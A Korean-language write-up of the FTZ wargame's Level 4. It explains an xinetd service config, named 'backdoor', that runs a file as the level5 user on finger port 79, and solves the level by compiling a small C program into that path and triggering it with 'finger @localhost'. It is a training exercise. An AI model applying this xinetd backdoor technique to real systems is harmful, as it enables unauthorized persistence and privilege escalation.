[FTZ] Level4 풀이

💡 FTZ Level4 풀이

문제

계정 : level4/suck my brain

hint

누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!

풀이

/etc/xinetd.d/ 폴더를 보니, backdoor파일이 생성되어 있습니다.

[level4@ftz level4]$ cat /etc/xinetd.d/backdoor
service finger
{
        disable = no
        flags           = REUSE
        socket_type     = stream
        wait            = no
        user            = level5
        server          = /home/level4/tmp/backdoor
        log_on_failure  += USERID
}

위의 xinetd 설정 파일은 다음과 같이 동작합니다.

1. service finger -> /etc/services에 설정된 파일에 따라서 79번 포트로 들어오는 finger서비스에 대한 요청을 해당 파일에서 처리 한다는 의미
2. disable = no -> yes는 끈다는 의미고 no는 작동중
3. flags,socket_type,wait -> tcp 서비스일때 이렇게 작성해 줌
4. user = level5 -> 아래 server 파일을 작동시킬 때 권한이 level5임
5. server -> 해당 서비스가 들어오면, user 권한에 따라서 ../tmp/backdoor 파일이 실행된다는 의미

즉 현재 79번 포트로 들어온 요청에 대해서 level5의 권한으로 backdoor를 실행하도록 설정되어 있습니다.

/home/level4/tmp/backdoor 파일은 현재 존재 하지 않습니다.

따라서 다음과 같이 /tmp 폴더에 backdoor.c 파일을 만들어 줍니다.

backdoor.c

#include <stdio.h>

int main(){
  system("my-pass");
  return 0;
}

만든 뒤에 /tmp 폴더에서 backdoor라는 이름으로 컴파일 해 줍니다.

gcc -o backdoor backdoor.c

이제 백도어 파일이 대기하고 있으므로, 79번 포트로 서비스를 요청해 줍니다.

서비스는 다음과 같이 요청합니다.

finger @localhost